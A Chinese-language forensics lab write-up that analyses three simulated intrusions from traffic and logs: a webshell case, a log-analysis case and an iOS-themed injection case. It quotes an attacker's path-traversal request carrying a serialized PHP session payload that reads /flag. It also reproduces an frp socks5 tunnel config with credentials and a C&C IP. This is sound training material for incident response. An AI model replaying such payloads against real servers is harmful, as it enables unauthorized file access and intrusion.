网络攻防技术——溯源取证与分析实验

一、题目

溯源取证分析作为网络攻防过程中重要环节&＃xff0c;准确找到攻击者的入侵线索(尤其是攻击突破口、攻击IP地址、域名、工具等信息)&＃xff0c;对于企业或者团队安全运营团队来说都是必备技能。常规攻击取证过程中往往会结合流量、Web访问日志、终端系统或者软件日志等信息来挖掘或者推断相关线索。本实验通过网络流量、日志等溯源环境进行真实案例模仿&＃xff0c;通过实战化分析来锻炼学生的取证溯源能力&＃xff0c;从而加深大家对于网络攻防的实战化水平。在本实验结束时&＃xff0c;学生应该能够具备对网络流量和日志的基本分析能力。

二、过程

一、Webshell数据包&＃xff08;webshell.zip&＃xff09;
小张单位网站被黑客挂马&＃xff0c;请您从流量中分析出webshell&＃xff0c;进行回答&＃xff1a;
A.黑客在整个过程中做了哪些操作&＃xff0c;请简单列举出来并截图说明。
1.黑客使用用户名test&＃xff0c;密码Admin123!&＃64;#登陆系统

2.黑客修改了一个日志文件&＃xff0c;相对路径为data/Runtime/Logs/Home/21_08_07.log,直接搜索:DOCUMENT_ROOT 可以直接知道网站根目录,绝对路径为/var/www/html/data/Runtime/Logs/Home/21_08_07.log

3.黑客获取webshell之后&＃xff0c;权限为www-data

4.黑客写入名为1.php的webshell文件

B.黑客登录系统使用的密码、黑客的socks5的连接账号与密码请列举出来&＃xff0c;并配图说明。
1.黑客登录系统使用的密码&＃xff1a;Admin123!&＃64;#

2.黑客的socks5的连接账号0HDFt16cLQJ&＃xff0c;密码为 JTN276Gp
将该value前两个字符去掉进行base64解码&＃xff0c;得到结果上传的文件名为frpc&＃xff1a;

将字符5B636F6D6D6F6E5D0A7365727665725F61646472203D203139322E3136382E3233392E3132330A7365727665725F706F7274203D20373737380A746F6B656E3D586133424A66326C35656E6D4E365A3741386D760A0A5B746573745F736F636B355D0A74797065203D207463700A72656D6F74655F706F7274203D383131310A706C7567696E203D20736F636B73350A706C7567696E5F75736572203D2030484446743136634C514A0A706C7567696E5F706173737764203D204A544E32373647700A7573655F656E6372797074696F6E203D20747275650A7573655F636F6D7072657373696F6E203D20747275650A进行hex解码&＃xff0c;得到结果如下&＃xff1a;
[common]
server_addr &＃61; 192.168.239.123
server_port &＃61; 7778
token&＃61;Xa3BJf2l5enmN6Z7A8mv

[test_sock5]
type &＃61; tcp
remote_port &＃61;8111
plugin &＃61; socks5
plugin_user &＃61; 0HDFt16cLQJ
plugin_passwd &＃61; JTN276Gp
use_encryption &＃61; true
use_compression &＃61; true

所以可以知道黑客的socks5的账号为0HDFt16cLQJ&＃xff0c;密码为 JTN276Gp

二、日志分析&＃xff08;日志分析.zip&＃xff09;
小明发现单位某应用程序被攻击后提取了对应的日志数据&＃xff0c;请分析日志并进行作答&＃xff1a;
A.网络存在源码泄漏&＃xff0c;源码文件名是什么&＃xff1f;(请提交带有文件后缀的文件名&＃xff0c;例如x.txt&＃xff0c;并对流量分析进行截图)
源码文件名为www.zip

B.分析攻击流量&＃xff0c;黑客往/tmp目录写入一个文件&＃xff0c;文件名是什么&＃xff1f;(请对流量分析进行截图)
搜索tmp得到如下文件名&＃xff0c;

/?filename&＃61;…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Ftmp%2Fsess_car&content&＃61;func%7CN%3Bfiles%7Ca%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22.%2Ffiles%2Ffilename%22%3Bs%3A20%3A%22call_user_func_array%22%3Bs%3A28%3A%22.%2Ffiles%2Fcall_user_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D HTTP/1.1
url解码后&＃xff1a;
/?filename&＃61;…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/sess_car&content&＃61;func|N;files|a:2:{s:8:“filename”;s:16:"./files/filename";s:20:“call_user_func_array”;s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:“SplFileObject”;}
经过url解码后得到文件名为&＃xff1a;sess_car

C.分析攻击流量&＃xff0c;黑客使用的是什么漏洞读取了秘密文件&＃xff1f;
由上一题结果可知&＃xff0c;使用的是SplFileObject漏洞

三、攻击“苹果”注入&＃xff08;ios.zip&＃xff09;
一位苹果安全研究员在家中使用手机联网被黑&＃xff0c;不仅被窃密还丢失比特币若干&＃xff0c;请你通过流量和日志分析后作答&＃xff1a;
A.简述黑客的整个攻击过程&＃xff0c;关键步骤请配图说明。
1.黑客控制C&C服务器&＃xff0c;IP为3.128.156.159

2.利用名为stowaway的Github开源项目

3.通过SQL盲注拿到敏感数据为746558f3-c841-456b-85d7-d6c0f2edabb2
4.黑客进行端口扫描。攻击了内网的几个服务器
5.写入了一个webshell&＃xff0c;其密码为fxxk

B.黑客所控制的C&C服务器IP是什么&＃xff1f;
IP是3.128.156.159

C.被害者手机上被拿走了的私钥文件内容是什么&＃xff1f;
私钥文件内容是746558f3-c841-456b-85d7-d6c0f2edabb2
过滤http2&＃xff0c;并导出后利用url解码&＃xff0c;得到sql注入爆破语句。

得到内容为746558f3-c841-456b-85d7-d6c0f2edabb2